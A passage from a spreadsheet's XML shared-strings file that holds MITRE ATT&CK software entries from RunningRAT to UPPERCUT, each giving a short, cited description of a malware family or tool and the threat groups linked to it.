    <t>[RunningRAT](https://attack.mitre.org/software/S0253) is a remote access tool that appeared in operations surrounding the 2018 Pyeongchang Winter Olympics along with [Gold Dragon](https://attack.mitre.org/software/S0249) and [Brave Prince](https://attack.mitre.org/software/S0252). (Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. [Ryuk](https://attack.mitre.org/software/S0446) shares code similarities with Hermes ransomware.(Citation: CrowdStrike Ryuk January 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) is a backdoor that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) since at least 2013.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) is a backdoor with installer and loader components that has been used by [TA505](https://attack.mitre.org/groups/G0092) since at least 2019.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>[SDelete](https://attack.mitre.org/software/S0195) is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools. (Citation: Microsoft SDelete July 2016)</t>
  </si>
  <si>
    <t>[SEASHARPEE](https://attack.mitre.org/software/S0185) is a Web shell that has been used by [OilRig](https://attack.mitre.org/groups/G0049). (Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) is a .NET backdoor used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2019.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHIPSHAPE](https://attack.mitre.org/software/S0028) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) is a custom backdoor used by [APT3](https://attack.mitre.org/groups/G0022). (Citation: FireEye Clandestine Wolf)</t>
  </si>
  <si>
    <t>[SHUTTERSPEED](https://attack.mitre.org/software/S0217) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) is an open source remote administration and post-exploitation framework primarily written in Python that includes stagers written in Powershell, C, and Boo. [SILENTTRINITY](https://attack.mitre.org/software/S0692) was used in a 2019 campaign against Croatian government agencies by unidentified cyber actors.(Citation: GitHub SILENTTRINITY March 2022)(Citation: Security Affairs SILENTTRINITY July 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) is a remote access Trojan written in C++ that has been used by an unidentified "sophisticated cyber actor" since at least January 2017.(Citation: CISA MAR SLOTHFULMEDIA October 2020)(Citation: Costin Raiu IAmTheKing October 2020) It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.(Citation: USCYBERCOM SLOTHFULMEDIA October 2020)(Citation: Kaspersky IAmTheKing October 2020)  
In October 2020, Kaspersky Labs assessed [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) is part of an activity cluster it refers to as "IAmTheKing".(Citation: Kaspersky IAmTheKing October 2020) ESET also noted code similarity between [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) and droppers used by a group it refers to as "PowerPool".(Citation: ESET PowerPool Code October 2020) </t>
  </si>
  <si>
    <t>[SLOWDRIFT](https://attack.mitre.org/software/S0218) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) against academic and strategic victims in South Korea. (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) is a Powershell-based .NET backdoor that was first reported in May 2021; it has been used by at least one ransomware-as-a-service affiliate.(Citation: FireEye Shining A Light on DARKSIDE May 2021)(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>[SNUGRIDE](https://attack.mitre.org/software/S0159) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045) as first stage malware. (Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[SPACESHIP](https://attack.mitre.org/software/S0035) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) is malware that executes SQL scripts to avoid leaving traditional host artifacts. [FIN7](https://attack.mitre.org/groups/G0046) has been observed using it.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) is Windows Script File (WSF) backdoor that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069), possibly since at least November 2021; there is also a [STARWHALE](https://attack.mitre.org/software/S1037) variant written in Golang with similar capabilities. Security researchers have also noted the use of [STARWHALE](https://attack.mitre.org/software/S1037) by UNC3313, which may be associated with [MuddyWater](https://attack.mitre.org/groups/G0069).(Citation: Mandiant UNC3313 Feb 2022)(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[SUGARDUMP](https://attack.mitre.org/software/S1042) is a proprietary browser credential harvesting tool that was used by UNC3890 during the [C0010](https://attack.mitre.org/campaigns/C0010) campaign. The first known [SUGARDUMP](https://attack.mitre.org/software/S1042) version was used since at least early 2021, a second SMTP C2 version was used from late 2021-early 2022, and a third HTTP C2 variant was used since at least April 2022.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>[SUGARUSH](https://attack.mitre.org/software/S1049) is a small custom backdoor that can establish a reverse shell over TCP to a hard coded C2 address. [SUGARUSH](https://attack.mitre.org/software/S1049) was first identified during analysis of UNC3890's [C0010](https://attack.mitre.org/campaigns/C0010) campaign targeting Israeli companies, which began in late 2020.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) is a trojanized DLL designed to fit within the SolarWinds Orion software update framework. It was used by [APT29](https://attack.mitre.org/groups/G0016) since at least February 2020.(Citation: SolarWinds Sunburst Sunspot Update January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[SUNSPOT](https://attack.mitre.org/software/S0562) is an implant that injected the [SUNBURST](https://attack.mitre.org/software/S0559) backdoor into the SolarWinds Orion software update framework. It was used by [APT29](https://attack.mitre.org/groups/G0016) since at least February 2020.(Citation: CrowdStrike SUNSPOT Implant January 2021) </t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) is an in-memory web shell written in .NET C#. It was discovered in November 2020 during the investigation of [APT29](https://attack.mitre.org/groups/G0016)'s SolarWinds cyber operation but determined to be unrelated. Subsequent analysis suggests [SUPERNOVA](https://attack.mitre.org/software/S0578) may have been used by the China-based threat group SPIRAL.(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: Unit42 SUPERNOVA Dec 2020)(Citation: SolarWinds Advisory Dec 2020)(Citation: CISA Supernova Jan 2021)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>[SYNful Knock](https://attack.mitre.org/software/S0519) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.(Citation: Mandiant - Synful Knock)(Citation: Cisco Synful Knock Evolution)</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) is a backdoor that has been in use since at least 2017 and has been associated with campaigns involving North Korean themes. [SYSCON](https://attack.mitre.org/software/S0464) has been delivered by the [CARROTBALL](https://attack.mitre.org/software/S0465) and [CARROTBAT](https://attack.mitre.org/software/S0462) droppers.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) is a .NET downloader that has been used by [Ember Bear](https://attack.mitre.org/groups/G1003) since at least March 2021.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) is a remote access tool (RAT) that first surfaced in 2012 and was used in intrusions throughout 2015. (Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) is ransomware that appeared in early 2016. Unlike some ransomware, its variants have required operators to manually interact with the malware to execute some of its core components.(Citation: US-CERT SamSam 2018)(Citation: Talos SamSam Jan 2018)(Citation: Sophos SamSam Apr 2018)(Citation: Symantec SamSam Oct 2018)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2014 to 2015. It was used primarily as a secondary backdoor for victims that were already compromised with [CozyCar](https://attack.mitre.org/software/S0046). (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) is malware that has been linked to [APT1](https://attack.mitre.org/groups/G0006)'s 2010 operations. It shares some code similarities with [OceanSalt](https://attack.mitre.org/software/S0346).(Citation: Mandiant APT1 Appendix)(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) is a backdoor first observed in late 2018. The backdoor is written in Delphi and is typically delivered as a DLL file.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[Seth-Locker](https://attack.mitre.org/software/S0639) is a ransomware with some remote control capabilities that has been in use since at least 2021.
(Citation: Trend Micro Ransomware February 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[ShadowPad](https://attack.mitre.org/software/S0596) is a modular backdoor that was first identified in a supply chain compromise of the NetSarang software in mid-July 2017. The malware was originally thought to be exclusively used by [APT41](https://attack.mitre.org/groups/G0096), but has since been observed to be used by various Chinese threat activity groups. (Citation: Recorded Future RedEcho Feb 2021)(Citation: Securelist ShadowPad Aug 2017)(Citation: Kaspersky ShadowPad Aug 2017) </t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) is wiper malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://attack.mitre.org/software/S0140) has also been seen leveraging [RawDisk](https://attack.mitre.org/software/S0364) and Filerase to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) is a backdoor malware written in C# and .NET that is an updated version of [Milan](https://attack.mitre.org/software/S1015); it has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least July 2021.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) is a .NET malware with backdoor capabilities.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has been used by the suspected China-based adversary [Mofang](https://attack.mitre.org/groups/G0103) in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development. The name "[ShimRat](https://attack.mitre.org/software/S0444)" comes from the malware's extensive use of Windows Application Shimming to maintain persistence. (Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) is a tool used by suspected Chinese adversary [Mofang](https://attack.mitre.org/groups/G0103) to automatically conduct initial discovery. The details from this discovery are used to customize follow-on payloads (such as [ShimRat](https://attack.mitre.org/software/S0444)) as well as set up faux infrastructure which mimics the adversary's targets. [ShimRatReporter](https://attack.mitre.org/software/S0445) has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three [Sibot](https://attack.mitre.org/software/S0589) variants in early 2021 during its investigation of [APT29](https://attack.mitre.org/groups/G0016) and the SolarWinds cyber intrusion campaign.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) is a C-based backdoor that has been used by [OilRig](https://attack.mitre.org/groups/G0049) since at least 2021.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) is malware that targets Kubernetes clusters through Windows containers. [Siloscape](https://attack.mitre.org/software/S0623) was first observed in March 2021.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>[Skeleton Key](https://attack.mitre.org/software/S0007) is malware used to inject false credentials into domain controllers with the intent of creating a backdoor password. (Citation: Dell Skeleton) Functionality similar to [Skeleton Key](https://attack.mitre.org/software/S0007) is included as a module in [Mimikatz](https://attack.mitre.org/software/S0002).</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) is a kernel-mode rootkit used for cryptocurrency mining.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) is an open source, cross-platform, red team command and control framework written in Golang.(Citation: Bishop Fox Sliver Framework August 2019)</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) is a Telegram Bot API-based Python backdoor that has been distributed using a Nullsoft Scriptable Install System (NSIS) Installer; it has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least January 2022.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: NCSC GCHQ Small Sieve Jan 2022)
Security researchers have also noted [Small Sieve](https://attack.mitre.org/software/S1035)'s use by UNC3313, which may be associated with [MuddyWater](https://attack.mitre.org/groups/G0069).(Citation: Mandiant UNC3313 Feb 2022)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) is a malicious bot application that can be used to load other malware.
[Smoke Loader](https://attack.mitre.org/software/S0226) has been seen in the wild since at least 2011 and has included a number of different payloads. It is notorious for its use of deception and self-protection. It also comes with several plug-ins. (Citation: Malwarebytes SmokeLoader 2016) (Citation: Microsoft Dofoil 2018)</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) is a backdoor that  abuses Socket Secure (SOCKS) proxies. (Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[SodaMaster](https://attack.mitre.org/software/S0627) is a fileless malware used by [menuPass](https://attack.mitre.org/groups/G0045) to download and execute payloads since at least 2020.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) is a modular backdoor written in C++ that has been used since at least 2019 to download and execute malicious payloads, including [FIVEHANDS](https://attack.mitre.org/software/S0618) ransomware.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) is first stage downloader used by [APT29](https://attack.mitre.org/groups/G0016) for exfiltration and to load other malware.(Citation: NCSC APT29 July 2020)(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">
[Spark](https://attack.mitre.org/software/S0543) is a Windows backdoor and has been in use since as early as 2017.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) is a Trojan backdoor that targets both Linux and OSX devices. It was first observed in January 2019. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) is a JavaScript based remote access tool that has been used by [Cobalt Group](https://attack.mitre.org/groups/G0080) since at least 2018.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) is a loader that was first seen in September 2021. It has been used in spam email campaigns to deliver additional malware such as [Cobalt Strike](https://attack.mitre.org/software/S0154) and the [QakBot](https://attack.mitre.org/software/S0650) banking trojan.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) is a full-featured backdoor used by [Naikon](https://attack.mitre.org/groups/G0019) that has multiple variants. (Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Starloader](https://attack.mitre.org/software/S0188) is a loader component that has been observed loading [Felismus](https://attack.mitre.org/software/S0171) and associated tools. (Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) is wiper malware discovered in destructive campaigns against both Middle Eastern and European targets in association with [APT33](https://attack.mitre.org/groups/G0064).(Citation: FireEye APT33 Sept 2017)(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) is a malware family that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009) since at least 2015. In 2016, it was distributed via legitimate compromised Korean websites. (Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) is a remote-access tool that has been used by [Moses Staff](https://attack.mitre.org/groups/G1009) in the initial stages of their attacks since at least November 2021.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) is an information stealing malware used by [PROMETHIUM](https://attack.mitre.org/groups/G0056).(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) is malware that has been used in spearphishing campaigns since approximately 2007 against victims primarily in the US. One variant of [Sykipot](https://attack.mitre.org/software/S0018) hijacks smart cards on victims. (Citation: Alienvault Sykipot DOD Smart Cards) The group using this malware has also been referred to as Sykipot. (Citation: Blasco 2013)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) is variant of Trojan ransomware targeting mainly English-speaking users since at least fall 2017. (Citation: SecureList SynAck Doppelgänging May 2018) (Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) is a backdoor that was used throughout 2013 by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) is a backdoor written in C++ that has been used by [Threat Group-3390](https://attack.mitre.org/groups/G0027) since at least 2020.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[Systeminfo](https://attack.mitre.org/software/S0096) is a Windows utility that can be used to gather detailed information about a computer. (Citation: TechNet Systeminfo)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. It has been used in multiple targeted attacks against U.S.-based organizations. (Citation: FireEye admin@338 March 2014) (Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) is a fully-featured beaconing implant integrated with command modules used by [Lazarus Group](https://attack.mitre.org/groups/G0032). It was first reported in May 2020.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TDTESS](https://attack.mitre.org/software/S0164) is a 64-bit .NET binary backdoor used by [CopyKittens](https://attack.mitre.org/groups/G0052). (Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>[TEARDROP](https://attack.mitre.org/software/S0560) is a memory-only dropper that was discovered on some victim machines during investigations related to the 2020 SolarWinds cyber intrusion. It was likely used by [APT29](https://attack.mitre.org/groups/G0016) since at least May 2020.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[TEXTMATE](https://attack.mitre.org/software/S0146) is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with [POWERSOURCE](https://attack.mitre.org/software/S0145) in February 2017. (Citation: FireEye FIN7 March 2017)</t>
  </si>
  <si>
    <t>[TINYTYPHON](https://attack.mitre.org/software/S0131) is a backdoor  that has been used by the actors responsible for the MONSOON campaign. The majority of its code was reportedly taken from the MyDoom worm. (Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) is a remote access tool (RAT) that has been used by [BlackTech](https://attack.mitre.org/groups/G0098) in campaigns against Japanese targets.(Citation: JPCert TSCookie March 2018)(Citation: JPCert BlackTech Malware September 2019). [TSCookie](https://attack.mitre.org/software/S0436) has been referred to as [PLEAD](https://attack.mitre.org/software/S0435) though more recent reporting indicates a separation between the two.(Citation: JPCert PLEAD Downloader June 2018)(Citation: JPCert BlackTech Malware September 2019)</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is a non-public backdoor. It has been dropped by [APT33](https://attack.mitre.org/groups/G0064)'s [StoneDrill](https://attack.mitre.org/software/S0380) malware. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) is a remote access tool that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) is a remote access trojan (RAT) that has been used by Chinese government cyber actors to maintain access on victim networks.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021) [Taidoor](https://attack.mitre.org/software/S0011) has primarily been used against Taiwanese government organizations since at least 2010.(Citation: TrendMicro Taidoor)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) is a multifunctional spying framework that has been in use since at least 2014. [TajMahal](https://attack.mitre.org/software/S0467) is comprised of two separate packages, named Tokyo and Yokohama, and can deploy up to 80 plugins.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[Tarrask](https://attack.mitre.org/software/S1011) is malware that has been used by [HAFNIUM](https://attack.mitre.org/groups/G0125) since at least August 2021. [Tarrask](https://attack.mitre.org/software/S1011) was designed to evade digital defenses and maintain persistence by generating concealed scheduled tasks.(Citation: Tarrask scheduled task)</t>
  </si>
  <si>
    <t>The [Tasklist](https://attack.mitre.org/software/S0057) utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. (Citation: Microsoft Tasklist)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) is a virus, data stealer, and wiper that presents itself as ransomware targeting macOS systems. [ThiefQuest](https://attack.mitre.org/software/S0595) was first seen in 2020 distributed via trojanized pirated versions of popular macOS software on Russian forums sharing torrent links.(Citation: Reed thiefquest fake ransom) Even though [ThiefQuest](https://attack.mitre.org/software/S0595) presents itself as ransomware, since the dynamically generated encryption key is never sent to the attacker it may be more appropriately thought of as a form of wiper malware.(Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)</t>
  </si>
  <si>
    <t>[ThreatNeedle](https://attack.mitre.org/software/S0665) is a backdoor that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2019 to target cryptocurrency, defense, and mobile gaming organizations.  It is considered to be an advanced cluster of [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Manuscrypt (a.k.a. NukeSped) malware family.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>[TinyTurla](https://attack.mitre.org/software/S0668) is a backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010) against targets in the US, Germany, and Afghanistan since at least 2020.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) is a bot written in C# that was developed by [Cleaver](https://attack.mitre.org/groups/G0003). (Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[Tomiris](https://attack.mitre.org/software/S0671) is a backdoor written in Go that continuously queries its C2 server for executables to download and execute on a victim system. It was first reported in September 2021 during an investigation of a successful DNS hijacking campaign against a Commonwealth of Independent States (CIS) member. Security researchers assess there are similarities between [Tomiris](https://attack.mitre.org/software/S0671) and [GoldMax](https://attack.mitre.org/software/S0588).(Citation: Kaspersky Tomiris Sep 2021)</t>
  </si>
  <si>
    <t>[Tor](https://attack.mitre.org/software/S0183) is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. [Tor](https://attack.mitre.org/software/S0183) utilizes "Onion Routing," in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. (Citation: Dingledine Tor The Second-Generation Onion Router)</t>
  </si>
  <si>
    <t>[Torisma](https://attack.mitre.org/software/S0678) is a second stage implant designed for specialized monitoring that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032). [Torisma](https://attack.mitre.org/software/S0678) was discovered during an investigation into the 2020 Operation North Star campaign that targeted the defense sector.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>[TrailBlazer](https://attack.mitre.org/software/S0682) is a modular malware that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2019.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) is a Trojan spyware program written in C++ that first emerged in September 2016 as a possible successor to [Dyre](https://attack.mitre.org/software/S0024). [TrickBot](https://attack.mitre.org/software/S0266) was developed and initially used by [Wizard Spider](https://attack.mitre.org/groups/G0102) for targeting banking sites in North America, Australia, and throughout Europe; it has since been used against all sectors worldwide as part of "big game hunting" ransomware campaigns.(Citation: S2 Grupo TrickBot June 2017)(Citation: Fidelis TrickBot Oct 2016)(Citation: IBM TrickBot Nov 2016)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) is a modular remote access tool used for recon and linked to [Dragonfly](https://attack.mitre.org/groups/G0035). The source code for [Trojan.Karagany](https://attack.mitre.org/software/S0094) originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. (Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)(Citation: Dragos DYMALLOY )</t>
  </si>
  <si>
    <t>[Trojan.Mebromi](https://attack.mitre.org/software/S0001) is BIOS-level malware that takes control of the victim before MBR. (Citation: Ge 2011)</t>
  </si>
  <si>
    <t>[Truvasys](https://attack.mitre.org/software/S0178) is first-stage malware that has been used by [PROMETHIUM](https://attack.mitre.org/groups/G0056). It is a collection of modules written in the Delphi programming language. (Citation: Microsoft Win Defender Truvasys Sep 2017) (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) is a backdoor that has been used by [BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, [Turian](https://attack.mitre.org/software/S0647) is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[UACMe](https://attack.mitre.org/software/S0116) is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. (Citation: Github UACMe)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) is a remote access tool that was identified in May 2017.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045). (Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
